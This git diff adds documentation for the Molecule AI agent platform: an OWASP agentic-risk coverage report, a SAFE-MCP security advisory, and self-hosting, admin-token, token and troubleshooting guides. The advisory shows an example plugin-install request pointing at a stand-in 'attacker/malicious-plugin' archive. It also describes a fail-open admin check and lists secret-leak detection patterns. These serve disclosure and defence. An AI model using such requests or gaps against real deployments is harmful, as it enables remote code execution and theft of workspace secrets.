+- **A2A result attribution:** A2A delegation responses include the source
+  workspace identity and the full execution trace. Consumers of A2A results
+  can audit where the data came from.
+- **Human review via canvas:** Results surfaced via `notify_user` or displayed
+  in the canvas are visible to humans who can flag hallucinated outputs.
+- **Activity logs for audit:** All tool call results are logged. If a downstream
+  agent acts on hallucinated data, the chain of events is traceable.
+
+**Residual risk:** The platform does not automatically detect or flag
+hallucinations — it provides observability. It is the operator's responsibility
+to configure confidence thresholds, set up automated result validation where
+possible, and review traces for signs of cascade errors.
+
+---
+
+## A08 — Overreliance ⚠️ PARTIAL
+
+**Risk:** Users or automated systems trust an agent's outputs without adequate
+verification, leading to harmful decisions based on incorrect agent outputs.
+
+**Molecule AI controls:**
+
+- **Observable decision traces:** Langfuse traces show the full chain of
+  reasoning and tool calls. Downstream consumers can audit outputs before
+  acting on them.
+- **Canvas notification clarity:** `notify_user` messages are human-readable
+  summaries — not raw JSON — which can include uncertainty indicators if the
+  agent is prompted to include them.
+- **Tier-based capability limits:** Higher tiers require explicit admin approval
+  to activate, ensuring operators are aware when a workspace has elevated
+  capabilities.
+
+**Gaps:**
+
+- **No automated output verification:** The platform does not provide a
+  built-in mechanism for agents to self-verify outputs (e.g., cross-checking a
+  code generation against a linter before returning).
+- **No confidence scoring surface:** The platform does not currently surface
+  LLM confidence or probability scores in a structured way. Agents that
+  include confidence in their outputs are relying on prompting alone.
+- **No policy enforcement on agent outputs:** There is no platform-level
+  mechanism to reject agent outputs that violate defined policies before they
+  are acted upon.
+
+**Recommendation:** Prompt agents to include uncertainty flags and self-check
+steps. Configure downstream systems to require human review for high-stakes
+agent outputs.
+
+---
+
+## A09 — Supply Chain Vulnerabilities ❌ NOT COVERED
+
+**Risk:** Vulnerable or malicious dependencies in the agent toolchain — workspace
+runtime packages, plugins, adapter libraries, or LLM provider SDKs.
+
+**Molecule AI's position:** This risk is inherited from the broader software
+supply chain and is not specifically addressed by the platform at this time.
+
+**What operators must manage independently:**
+
+- Workspace runtime dependencies (`molecule-ai-workspace-runtime` and its
+  transitive dependencies)
+- Plugin dependencies (see
+  [SAFE-MCP Advisory: G-01](/docs/security/safe-mcp-advisory#g-01-unpinned-npm-mcp-packages--high))
+- Workspace template adapter dependencies (Python packages installed by
+  adapter-specific Dockerfiles)
+- LLM provider SDKs and their transitive dependencies
+
+**Mitigation operators should apply:**
+
+- Pin all Python and npm dependencies to exact versions in workspace templates
+  and plugins
+- Use `npm ci` / `pip freeze` and commit lockfiles
+- Subscribe to security advisories for all runtime dependencies
+- Scan container images for known CVEs before deploying
+
+---
+
+## A10 — Improper Agency Grants ❌ NOT COVERED
+
+**Risk:** An agent is granted more agency (capability to take actions, access
+resources, make changes) than it needs — creating blast radius if the agent is
+compromised or misbehaves.
+
+**Molecule AI's position:** The platform provides the building blocks for
+least-privilege agent design (tier-based caps, per-workspace secrets, scoped
+tokens, memory isolation) but does not enforce least-privilege agency at the
+agent action level.
+
+**Gaps:**
+
+- **No action-level RBAC:** The MCP server exposes all 87 tools to all
+  authenticated workspaces. There is no mechanism to restrict a specific
+  agent's access to a subset of tools (e.g., blocking `delete_workspace` or
+  `send_channel_message` for a read-only agent).
+- **No approval workflow for high-impact actions:** The platform does not
+  support requiring human approval before an agent executes a high-impact tool
+  (e.g., deleting a resource, sending an external API request, modifying a
+  secret).
+- **Admin tokens are all-or-nothing:** The `ADMIN_TOKEN` gates all `/admin/*`
+  endpoints. There is no concept of scoped admin tokens with per-endpoint
+  permissions.
+- **Plugins have full workspace access:** Once a plugin is installed, it
+  executes within the workspace context with access to all workspace tools and
+  secrets.
+
+**Recommendation:** Apply defense in depth — restrict MCP tool exposure at the
+agent configuration level, use workspace tiers to limit container capabilities,
+and review plugin manifests before installation (see
+[SAFE-MCP Advisory: G-02](/docs/security/safe-mcp-advisory#g-02-no-manifest-signing--high)).
+
+---
+
+## Coverage methodology
+
+This report was produced by Research Lead (2026-04-18) reviewing platform source
+code, configuration defaults, and the deployed security posture against each
+OWASP Agentic AI Top 10 category.
+
+**"COVERED"** means the platform provides specific, built-in controls that
+mitigate the risk, even if residual risk remains at the agent behavior level.
+
+**"PARTIAL"** means the platform provides some controls but significant gaps
+remain that operators must address through configuration or complementary
+ tooling.
+
+**"NOT COVERED"** means the risk is not addressed by the platform as shipped.
+Operators must manage it independently.
+
+---
+
+## Reporting gaps
+
+If you believe a coverage assessment is incorrect or want to propose a new
+control for a gap, open an issue in `Molecule-AI/molecule-core` tagged
+`security` or reach out through your support channel.
--- a/content/docs/security/safe-mcp-advisory.mdx
+++ b/content/docs/security/safe-mcp-advisory.mdx
@ -0,0 +1,262 @@
+---
+title: SAFE-MCP Security Advisory (2026-04-17)
+description: High-severity findings from the SAFE-MCP audit and recommended mitigations for self-hosted deployments.
+---
+
+## Advisory overview
+
+This advisory documents three HIGH-severity findings from the SAFE-MCP
+security audit performed on the Molecule AI platform in April 2026. All three
+affect **self-hosted** deployments. If you are using the SaaS offering at
+`moleculesai.app`, mitigations are applied server-side — no action needed.
+
+**Published:** April 17, 2026
+**Severity:** HIGH (G-01, G-02, G-03)
+**Affected versions:** All self-hosted deployments prior to the fixes shipped
+in PRs #808 and associated plugin updates.
+**Fixed in:** `molecule-core` PRs #808 (platform), #809 (plugin scaffold).
+
+---
+
+## G-01: Unpinned npm MCP packages — HIGH
+
+### Description
+
+The workspace plugin scaffold (`plugins/molecule-ai-plugin-*/package.json`) uses
+unpinned version ranges for npm dependencies:
+
+```json
+"dependencies": {
+  "@anthropic-ai/sdk": "^0.32.0"
+}
+```
+
+The caret (`^`) range means `npm install` can resolve to any compatible version,
+including versions with known vulnerabilities or a malicious `next` release
+published after the audit date.
+
+### Risk
+
+- Supply chain compromise if a package maintainer publishes a malicious version
+- Silent dependency drift as `npm install` pulls newer patch/minor versions
+- Potential conflicts with workspace-runtime's own dependency tree
+
+### Recommended mitigation
+
+Pin all npm dependencies to exact versions before deploying:
+
+```bash
+# In each plugin directory
+npm install --save-exact @anthropic-ai/sdk@0.32.1
+npm install --save-exact <other-deps>
+```
+
+Add an `.npmrc` to enforce pinned installs:
+
+```ini
+save-exact=true
+```
+
+Commit `package-lock.json` and verify CI installs from the lockfile:
+
+```bash
+npm ci  # instead of npm install
+```
+
+For the platform build, ensure `npm ci` is used in CI rather than `npm install`
+to respect the lockfile.
+
+---
+
+## G-02: No manifest signing — HIGH
+
+### Description
+
+Plugin manifests (`manifest.json`) are served by the platform and executed by
+workspace containers without cryptographic verification. There is no mechanism
+to confirm that the manifest has not been tampered with after it was published
+by the plugin author.
+
+### Risk
+
+- An attacker with write access to the plugin source repository (or the CDN
+  serving it) could modify `manifest.json` to:
+  - Inject additional tools that exfiltrate secrets from the workspace
+  - Redirect API calls to a malicious endpoint
+  - Add an attacker-controlled `entrypoint` path
+
+### Recommended mitigation
+
+**短期 (short-term):** Inspect `manifest.json` files for all plugins before
+enabling them. Verify the `author`, `version`, and `entrypoint` are from a
+trusted source. Do not enable plugins from untrusted or unknown authors.
+
+**长期 (long-term):** The platform will add manifest signing aligned with the
+OWASP MCPS (MCP Secure) cryptographic security layer. Plugin authors digitally
+sign their tool definitions (name, description, inputSchema) with an ECDSA P-256
+key pair. The platform verifies signatures against the author's published public
+key, computes and stores schema hashes for pinning, and rejects connections where
+the schema hash has changed since the last verified session — providing "rug pull
+protection." This follows the MCPS L3 trust level: signed tool definitions
+required. Track progress in `molecule-core` issue tracker.
+
+Until signing is available, treat plugin manifests as untrusted input.
+
+---
+
+## G-03: Floating plugin references — HIGH
+
+### Description
+
+Workspaces can install plugins by referencing any publicly accessible URL:
+
+```bash
+POST /workspaces/:id/plugins
+{
+  "source": "https://github.com/attacker/malicious-plugin/archive/refs/heads/main.tar.gz"
+}
+```
+
+There is no allowlist, no integrity check, and no review gate on the plugin
+URL before the workspace downloads and executes code from it.
+
+### Risk
+
+- Confidential workspace data (secrets, memory, files) is sent to attacker-controlled servers
+- Arbitrary code execution within the workspace container
+- Lateral movement from the workspace container to internal services
+
+### Recommended mitigations
+
+**1. Restrict plugin installation in your deployment config:**
+
+Add a platform-level environment variable to allow only approved plugin sources.
+Until this variable exists, enforce it at the network layer (see below).
+
+**2. Network-level egress filtering:**
+
+Block outbound traffic from workspace containers to all IPs except the
+platform API and required external services (LLM providers, vector DBs, etc.).
+Workspace containers should not be able to reach arbitrary GitHub archives or
+external plugin URLs directly.
+
+Example Fly.io `fly.toml` rule:
+
+```toml
+[[vm]]
+  auto_destroy = false
+
+# App-level egress rules (Fly Private Network)
+```
+
+Or use a Kubernetes `NetworkPolicy`:
+
+```yaml
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+  name: workspace-egress-lockdown
+spec:
+  podSelector:
+    matchLabels:
+      component: workspace
+  policyTypes:
+    - Egress
+  egress:
+    - to:
+        - podSelector: {}
+      ports:
+        - port: 8080  # platform API
+    - to:
+        - namespaceSelector: {}
+          podSelector:
+            matchLabels:
+              app: redis
+      ports:
+        - port: 6379
+    # Block all other egress
+```
+
+**3. Plugin allowlist (platform-level):**
+
+Set `PLUGIN_ALLOW_UNPINNED=false` in your environment to reject any plugin
+install requests that reference unpinned or unverified sources.
+
+---
+
+## Remediation checklist for self-hosted operators
+
+- [ ] Audit all plugin `package.json` files — pin all dependencies to exact versions
+  *(MCP04: "avoid 'latest' or floating version references")*
+- [ ] Verify CI/CD uses `npm ci` not `npm install`
+  *(MCP04: "no dependency integrity verification")*
+- [ ] Commit and push `package-lock.json` for all plugins
+- [ ] Add `.npmrc save-exact=true` to all plugin directories
+- [ ] Inspect `manifest.json` for any enabled plugin before use
+  *(MCP04: "MCP connectors or plugins are installed without signing or provenance checks")*
+- [ ] Block workspace egress to non-approved hosts at the network level
+  *(MCP09: "no asset inventory or endpoint discovery process")*
+- [ ] Set `PLUGIN_ALLOW_UNPINNED=false` (when available)
+  *(MCP09: "teams can deploy MCP servers without central registration or security review")*
+- [ ] Watch `molecule-core` for the manifest-signing feature
+  *(MCPS L3: "tool definition signatures required")*
+
+---
+
+## Normative references
+
+The mitigations in this advisory align with the following OWASP publications:
+
+**MCP04:2025 — Software Supply Chain Attacks & Dependency Tampering**
+*OWASP MCP Top 10, 2025 edition*
+[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
+
+Relevant controls that informed G-01 and G-02 mitigations:
+
+- *Signed Components & Provenance Verification:* "Require cryptographic signing for
+  SDKs, plugins, tool manifests, container images, and validate signatures during
+  installation and startup."
+- *Version Pinning & Approved Registries:* "Pin component versions and avoid
+  'latest' references. Use internal package mirrors or registries and block direct
+  downloads from public internet sources."
+- *Build SBOM/CBOM Visibility:* "Generate software bill of materials (SBOM) and
+  cryptographic bill of materials (CBOM) snapshots for each MCP server and plugin
+  package. Store these alongside deployments for auditing and incident response."
+- *Dependency Scanning:* "Apply software composition analysis (SCA) and code
+  scanning tools to detect known CVEs, malicious indicators, and poisoned transitive
+  dependencies."
+
+**MCP09:2025 — Shadow MCP Servers**
+*OWASP MCP Top 10, 2025 edition*
+[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
+
+Relevant controls that informed the G-03 plugin allowlist mitigation:
+
+- *Central MCP Governance & Registry:* "Create a centralized registry where every
+  instance must be registered before deployment; tie registration to CI/CD pipelines."
+- *Discovery & Continuous Scanning:* "Use network discovery tools to detect open
+  MCP ports and endpoints; automate weekly shadow MCP detection scans."
+- *Baseline Configuration Templates:* "Enforce authentication (mTLS, OAuth), disable
+  unauthenticated tool calls, include preconfigured logging."
+
+**MCPS — Cryptographic Security Layer for MCP**
+*OWASP MCP Top 10 Recommended Controls*
+[*OWASP MCP Top 10 Recommended Controls*](https://github.com/OWASP/www-project-mcp-top-10/tree/master/2025/recommended-controls)
+
+The MCPS specification defines the Tool Definition Signing approach referenced in
+the G-02 long-term mitigation:
+
+- Tool authors sign tool definitions (name, description, inputSchema) with an
+  ECDSA P-256 private key; clients verify against the author's published public key.
+- Schema hashes are computed and stored on first verified connection, then compared
+  on subsequent connections to detect unauthorized modifications — "rug pull protection."
+- MCPS defines four trust levels (L0–L4); the G-02 long-term fix targets L3:
+  "L3: L2 plus tool definition signatures required."
+
+---
+
+## Reporting security issues
+
+If you discover a new security issue in Molecule AI, please report it via
+GitHub Security Advisories on `Molecule-AI/molecule-core` or contact the
+security team through your support channel.
--- a/content/docs/self-hosting.mdx
+++ b/content/docs/self-hosting.mdx
@ -0,0 +1,208 @@
+---
+title: Self-Hosting
+description: Run the full Molecule AI stack on your own infrastructure.
+---
+
+## Prerequisites
+
+| Requirement | Minimum Version |
+|-------------|----------------|
+| Docker Desktop | Latest stable |
+| Go | 1.25+ |
+| Node.js | 20+ |
+| Git | 2.x |
+
+## Quick Start
+
+The fastest way to get Molecule AI running locally:
+
+```bash
+git clone https://github.com/Molecule-AI/molecule-core.git
+cd molecule-core
+./scripts/dev-start.sh
+# Canvas: http://localhost:3000
+# Platform: http://localhost:8080
+```
+
+This script starts all infrastructure services, builds the platform, and launches the canvas dev server.
+
+## Infrastructure Setup
+
+Molecule AI depends on four infrastructure services, all managed via `docker-compose.infra.yml` and attached to the shared `molecule-monorepo-net` Docker network:
+
+| Service | Port | Purpose |
+|---------|------|---------|
+| Postgres | 5432 | Primary datastore (also backs Langfuse and Temporal) |
+| Redis | 6379 | Pub/sub, heartbeat TTLs |
+| Langfuse | 3001 | LLM trace viewer (backed by ClickHouse) |
+| Temporal | 7233 (gRPC), 8233 (Web UI) | Durable workflow engine |
+
+Start infrastructure only:
+
+```bash
+./infra/scripts/setup.sh
+```
+
+Tear everything down (removes volumes):
+
+```bash
+./infra/scripts/nuke.sh
+```
+
+## Manual Setup
+
+If you prefer to start each component individually:
+
+### Platform (Go)
+
+```bash
+cd platform
+go build ./cmd/server
+go run ./cmd/server
+# Requires Postgres + Redis running
+```
+
+The platform must be run from the `platform/` directory, not the repo root.
+
+### Canvas (Next.js)
+
+```bash
+cd canvas
+npm install
+npm run dev
+# Dev server on http://localhost:3000
+```
+
+### Docker Compose
+
+For infrastructure only:
+
+```bash
+docker compose -f docker-compose.infra.yml up -d
+```
+
+For the full stack (infrastructure + platform + canvas):
+
+```bash
+docker compose up
+```
+
+## Environment Variables
+
+### Platform
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `DATABASE_URL` | -- | Postgres connection string (required) |
+| `REDIS_URL` | -- | Redis connection string (required) |
+| `PORT` | `8080` | Platform HTTP port |
+| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers to reach the platform |
+| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Comma-separated allowed origins |
+| `SECRETS_ENCRYPTION_KEY` | -- | AES-256 key (32 bytes) for encrypting workspace secrets |
+| `WORKSPACE_DIR` | -- | Global fallback host path for `/workspace` bind-mount |
+| `MOLECULE_ENV` | -- | Set to `production` to hide E2E helper endpoints |
+| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are retained |
+| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | How often the cleanup job runs |
+| `RATE_LIMIT` | `600` | Requests per minute per client |
+
+### Tier Resource Limits
+
+Override per-tier memory and CPU caps for workspace containers. CPU\_SHARES follows Docker's convention where 1024 equals 1 CPU.
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `TIER2_MEMORY_MB` | `512` | Standard tier memory limit |
+| `TIER2_CPU_SHARES` | `1024` | Standard tier CPU shares |
+| `TIER3_MEMORY_MB` | `2048` | Privileged tier memory limit |
+| `TIER3_CPU_SHARES` | `2048` | Privileged tier CPU shares |
+| `TIER4_MEMORY_MB` | `4096` | Full-host tier memory limit |
+| `TIER4_CPU_SHARES` | `4096` | Full-host tier CPU shares |
+
+### Plugin Install Safeguards
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` | Max request body size (64 KiB) |
+| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch and copy deadline |
+| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` | Max staged-tree size (100 MiB) |
+
+### Canvas
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API URL |
+| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
+
+### Tenant Mode
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `CANVAS_PROXY_URL` | -- | When set, the Go server proxies canvas requests to this URL |
+| `MOLECULE_ORG_ID` | -- | UUID for multi-tenant isolation; leave unset for self-hosted |
+
+## Production Deployment
+
+For production, use `platform/Dockerfile.tenant` which builds a combined Go + Canvas image:
+
+```bash
+docker build -f platform/Dockerfile.tenant -t molecule-platform .
+```
+
+This image serves both the API and the canvas frontend from a single container.
+
+## Security Configuration
+
+### Secrets Encryption
+
+Set `SECRETS_ENCRYPTION_KEY` to a 32-byte AES-256 key to encrypt workspace secrets at rest. Without this variable, secrets are stored in plaintext.
+
+```bash
+# Generate a key
+openssl rand -hex 32
+```
+
+**Warning:** `SECRETS_ENCRYPTION_KEY` cannot be rotated without a data migration. Choose carefully before deploying to production.
+
+### Rate Limiting
+
+The `RATE_LIMIT` variable (default 600 requests/min) applies per client. Adjust based on your expected traffic.
+
+### CORS
+
+Set `CORS_ORIGINS` to a comma-separated list of allowed origins. In production, restrict this to your actual domain.
+
+## Admin Authentication
+
+All `/admin/*` endpoints require `ADMIN_TOKEN`. See
+[ADMIN_TOKEN — Production Requirement](/docs/self-hosting/admin-token) for
+setup, generation, and fail-open risk details.
+
+**Action required by April 22, 2026:** Set `ADMIN_TOKEN` in all production
+deployments before this date.
+
+## Pre-commit Hook
+
+Install the project's pre-commit hooks to enforce code quality:
+
+```bash
+git config core.hooksPath .githooks
+```
+
+The hook enforces:
+
+- `'use client'` directive on hook-using `.tsx` files
+- Dark theme only (no `white` or `light` CSS classes)
+- No SQL injection patterns (`fmt.Sprintf` with SQL)
+- No leaked secrets (`sk-ant-`, `ghp_`, `AKIA`)
+
+Commits are rejected until all violations are fixed.
+
+## Building Workspace Images
+
+Build the base workspace image for local development:
+
+```bash
+bash workspace-template/build-all.sh
+```
+
+Adapter-specific images are built from standalone template repos. Each repo's `Dockerfile` installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies.
--- a/content/docs/self-hosting/admin-token.mdx
+++ b/content/docs/self-hosting/admin-token.mdx
@ -0,0 +1,104 @@
+---
+title: ADMIN_TOKEN — Production Requirement
+description: Mandatory ADMIN_TOKEN configuration for self-hosted Molecule AI deployments.
+---
+
+## Overview
+
+`ADMIN_TOKEN` is a **required** secret for all production Molecule AI deployments.
+It gates access to administrative endpoints and must be set before going live.
+
+**Deadline to migrate: April 22, 2026.** Deployments without `ADMIN_TOKEN` set
+will begin rejecting `/admin/*` requests after this date.
+
+## What ADMIN_TOKEN is
+
+`ADMIN_TOKEN` is a bearer token that authenticates callers to the platform's
+administrative endpoints (`/admin/*`). It is checked by the `AdminAuth`
+middleware on every admin route.
+
+## Generating a token
+
+Generate a cryptographically random token:
+
+```bash
+openssl rand -base64 32
+```
+
+Store the output — it is shown only once and cannot be recovered from the
+platform.
+
+## Setting ADMIN_TOKEN in production
+
+### Fly.io (recommended for self-hosted)
+
+```bash
+fly secrets set ADMIN_TOKEN="your-generated-token"
+fly deploy
+```
+
+### Docker / Docker Compose
+
+```yaml
+services:
+  platform:
+    environment:
+      ADMIN_TOKEN: "your-generated-token"
+```
+
+### Bare-metal / systemd
+
+```bash
+export ADMIN_TOKEN="your-generated-token"
+./platform-server  # or however you start the binary
+```
+
+## What ADMIN_TOKEN gates
+
+All `/admin/*` endpoints require `Authorization: Bearer <ADMIN_TOKEN>`:
+
+| Endpoint | Purpose |
+|---|---|
+| `GET /admin/workspaces` | List all workspaces |
+| `POST /admin/workspaces/:id/pause` | Pause a workspace |
+| `POST /admin/workspaces/:id/resume` | Resume a workspace |
+| `POST /admin/workspaces/:id/terminate` | Force-terminate a container |
+| `GET /admin/metrics` | Platform-level metrics |
+| `POST /admin/tier-promote` | Promote a workspace to a higher tier |
+
+## What happens if ADMIN_TOKEN is missing
+
+In deployments where `ADMIN_TOKEN` is **unset** (empty string or not present in
+the environment), the `AdminAuth` middleware currently **fail-opens** — it allows
+all requests through without credential validation.
+
+This fail-open behavior exists for backward compatibility during the transition
+period but **will be removed**. After April 22, 2026, requests to `/admin/*`
+endpoints without a valid `ADMIN_TOKEN` will return `401 Unauthorized`.
+
+## Verifying your setup
+
+Check that `ADMIN_TOKEN` is present and working:
+
+```bash
+curl -s -H "Authorization: Bearer $ADMIN_TOKEN" \
+  http://localhost:8080/admin/workspaces | jq '.count'
+```
+
+If the response is `401`, the token is missing or incorrect. If you get a JSON
+payload with a `count` field, the token is working.
+
+## Rotating ADMIN_TOKEN
+
+To rotate without downtime:
+
+1. **Deploy** the new token: `fly secrets set ADMIN_TOKEN="new-token" && fly deploy`
+2. **Verify** the new token works (see above)
+3. **Remove** the old token: `fly secrets unset OLD_TOKEN_NAME` (Fly does not
+   persist old secret values after unset)
+
+## Related
+
+- [Self-Hosting overview](/docs/self-hosting) — full deployment guide
+- [Security Configuration](/docs/self-hosting#security-configuration) — other
+  production security variables
--- a/content/docs/tokens.mdx
+++ b/content/docs/tokens.mdx
@ -0,0 +1,115 @@
+---
+title: Token Management
+description: Create, list, and revoke workspace bearer tokens for API authentication.
+---
+
+Workspace bearer tokens authenticate agents and API clients against the
+Molecule AI platform. Each token is scoped to a single workspace — a token
+from workspace A cannot access workspace B.
+
+## Endpoints
+
+All endpoints are behind `WorkspaceAuth` middleware — you need an existing
+valid token to manage tokens. The first token is issued during workspace
+registration (`POST /registry/register`).
+
+### List tokens
+
+```bash
+GET /workspaces/:id/tokens
+Authorization: Bearer <token>
+```
+
+Returns non-revoked tokens. Only metadata is returned — never the plaintext or hash.
+
+```json
+{
+  "tokens": [
+    {
+      "id": "uuid-of-token-row",
+      "prefix": "abc12345",
+      "created_at": "2026-04-16T12:00:00Z",
+      "last_used_at": "2026-04-16T15:30:00Z"
+    }
+  ],
+  "count": 1
+}
+```
+
+### Create token
+
+```bash
+POST /workspaces/:id/tokens
+Authorization: Bearer <token>
+```
+
+Mints a new token. The plaintext is returned **exactly once** — save it immediately.
+
+```json
+{
+  "auth_token": "dGhpcyBpcyBhIHRlc3QgdG9rZW4...",
+  "workspace_id": "ws-uuid",
+  "message": "Save this token now — it cannot be retrieved again."
+}
+```
+
+### Revoke token
+
+```bash
+DELETE /workspaces/:id/tokens/:tokenId
+Authorization: Bearer <token>
+```
+
+Revokes a specific token by its database ID (from the List response).
+
+```json
+{
+  "status": "revoked"
+}
+```
+
+Returns 404 if the token doesn't exist, belongs to a different workspace, or
+is already revoked.
+
+## Token rotation
+
+To rotate credentials without downtime:
+
+1. **Create** a new token: `POST /workspaces/:id/tokens`
+2. **Update** your agent to use the new token
+3. **Verify** the new token works (check `last_used_at` in List)
+4. **Revoke** the old token: `DELETE /workspaces/:id/tokens/:oldTokenId`
+
+## Bootstrap — getting your first token
+
+The first token is issued during workspace registration:
+
+```bash
+# 1. Create workspace
+curl -X POST http://localhost:8080/workspaces \
+  -H "Content-Type: application/json" \
+  -d '{"name": "My Agent", "tier": 2}'
+
+# 2. Register (returns auth_token)
+curl -X POST http://localhost:8080/registry/register \
+  -H "Content-Type: application/json" \
+  -d '{"workspace_id": "<id>", "url": "http://...", "agent_card": {...}}'
+```
+
+For local development, the test-token endpoint is also available (disabled in production):
+
+```bash
+curl http://localhost:8080/admin/workspaces/<id>/test-token
+```
+
+## Security properties
+
+| Property | Detail |
+|---|---|
+| Entropy | 256-bit (32 random bytes, base64url-encoded) |
+| Storage | sha256 hash only — plaintext never persisted |
+| Scope | Per-workspace — token A cannot auth workspace B |
+| Display | Shown once at creation, not recoverable |
+| Prefix | First 8 characters stored for log correlation |
+| Expiration | None — tokens are permanent until revoked |
+| Auto-revoke | All tokens revoked when workspace is deleted |
--- a/content/docs/troubleshooting.mdx
+++ b/content/docs/troubleshooting.mdx
@ -0,0 +1,164 @@
+---
+title: Troubleshooting
+description: Common issues and how to fix them.
+---
+
+## Workspace Stuck in "Provisioning"
+
+A workspace that stays in `provisioning` for more than 30 seconds usually indicates a container startup failure.
+
+**Steps to diagnose:**
+
+1. Check Docker logs for the workspace container:
+   ```bash
+   docker logs <container-id>
+   ```
+2. Verify the workspace image exists locally:
+   ```bash
+   docker images | grep workspace-template
+   ```
+3. Check tier resource limits -- the container may be OOM-killed on start. Review `TIER2_MEMORY_MB` / `TIER3_MEMORY_MB` / `TIER4_MEMORY_MB` values.
+4. Ensure the platform can reach the Docker daemon (Docker Desktop must be running).
+
+## 401 Unauthorized on API Calls
+
+Bearer tokens can expire or be revoked. Workspace tokens are also auto-revoked when a workspace is deleted.
+
+**Resolution:**
+
+- For workspace-scoped endpoints, mint a new token:
+  ```bash
+  # Development/staging only (hidden when MOLECULE_ENV=production)
+  curl http://localhost:8080/admin/workspaces/:id/test-token
+  ```
+- For admin endpoints, verify your token is still valid against a known-good endpoint like `GET /health`.
+- Legacy workspaces (created before Phase 30.1) are grandfathered and do not require tokens on heartbeat/update-card routes.
+
+## WebSocket Shows "Reconnecting"
+
+The canvas WebSocket connection (`/ws`) drops and retries.
+
+**Common causes:**
+
+- `CORS_ORIGINS` does not include your domain -- the WebSocket upgrade is rejected. Add your origin to the comma-separated list.
+- A reverse proxy or firewall is terminating the long-lived connection. Ensure WebSocket upgrade headers are forwarded.
+- The platform process crashed or restarted. Check platform logs.
+
+**Verify connectivity:**
+
+```bash
+# Quick check that the WS endpoint is reachable
+curl -i -N \
+  -H "Connection: Upgrade" \
+  -H "Upgrade: websocket" \
+  -H "Sec-WebSocket-Version: 13" \
+  -H "Sec-WebSocket-Key: dGVzdA==" \
+  http://localhost:8080/ws
+```
+
+## Agent Not Responding to A2A
+
+When one agent cannot reach another via the A2A proxy (`POST /workspaces/:id/a2a`), check communication rules.
+
+**The `CanCommunicate` access check allows:**
+
+- Same workspace (self-call)
+- Siblings (same parent)
+- Root-level siblings (both have no parent)
+- Parent to child or child to parent
+
+**Everything else is denied.** If two agents need to communicate, they must be in the same subtree.
+
+**Also verify:**
+
+- The target workspace is `online` (not `paused`, `offline`, or `provisioning`)
+- The target's heartbeat is fresh (Redis TTL has not expired)
+- The caller includes `X-Workspace-ID` and `Authorization: Bearer <token>` headers
+
+## Schedule Not Firing
+
+Cron schedules are managed by the platform scheduler subsystem.
+
+**Checklist:**
+
+- Verify the cron expression is valid (standard 5-field cron syntax)
+- Confirm the workspace is `online` -- paused workspaces skip all schedules
+- Check if the schedule was `skipped` due to concurrency: the scheduler skips when `active_tasks > 0`. Review schedule history:
+  ```
+  GET /workspaces/:id/schedules/:scheduleId/history
+  ```
+- Inspect `GET /admin/liveness` to ensure the scheduler subsystem is alive (age should be under 60 seconds)
+
+## Channel Test Fails
+
+Social channel integrations (Telegram, Slack, etc.) can fail for several reasons.
+
+**Diagnose:**
+
+- Verify the bot token is correct and has not been revoked by the platform provider
+- Check the allowlist config in the channel's JSONB settings -- messages from non-allowlisted chats are silently dropped
+- Ensure the webhook URL is registered with the external platform:
+  ```
+  POST /webhooks/:type
+  ```
+  This is the endpoint the external platform (Telegram, Slack) should send events to.
+- Test the connection explicitly:
+  ```
+  POST /workspaces/:id/channels/:channelId/test
+  ```
+
+## Migration Crash on Boot
+
+The platform runs all `*.up.sql` migrations on every startup (there is no `schema_migrations` tracking table yet).
+
+**Common issues:**
+
+- Migrations must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`). If a migration lacks this guard, the second boot fails.
+- Before PR #212, the migration runner did not filter `.down.sql` files, causing tables to be dropped on every boot. Ensure you are running a platform version that includes this fix.
+- If you see errors about duplicate columns or tables, the migration is not idempotent. Patch the `.up.sql` file to add `IF NOT EXISTS` guards.
+
+## Canvas Blank or 502 on Tenant Deploy
+
+In tenant mode (`platform/Dockerfile.tenant`), the Go server proxies canvas requests.
+
+**Verify:**
+
+- `CANVAS_PROXY_URL` is set and points to the running Next.js process inside the container
+- Both the Go server and the Node.js process are running (check container logs for both)
+- The Next.js build completed successfully during `docker build`
+
+## Plugin Install Timeout
+
+Large plugins or slow network connections can exceed the default fetch deadline.
+
+**Adjust limits:**
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Increase for large or remote plugins |
+| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Increase if the plugin tree exceeds 100 MiB |
+| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Increase if the install request body is large |
+
+## Memory or Disk Usage Growing
+
+Activity logs and structure events accumulate over time.
+
+**Tune retention:**
+
+- `ACTIVITY_RETENTION_DAYS` (default `7`) -- reduce to 3 or even 1 for high-traffic deployments
+- `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default `6`) -- reduce to run cleanup more frequently
+- Monitor the `activity_logs` and `structure_events` tables directly if disk usage is a concern:
+  ```sql
+  SELECT pg_size_pretty(pg_total_relation_size('activity_logs'));
+  SELECT pg_size_pretty(pg_total_relation_size('structure_events'));
+  ```
+
+## Container Health Detection
+
+If workspaces go offline unexpectedly (e.g., Docker Desktop crash), three layers detect the failure:
+
+1. **Passive (Redis TTL):** 60-second heartbeat key expires, liveness monitor triggers auto-restart
+2. **Proactive (Health Sweep):** Docker API polled every 15 seconds, catches dead containers faster than TTL expiry
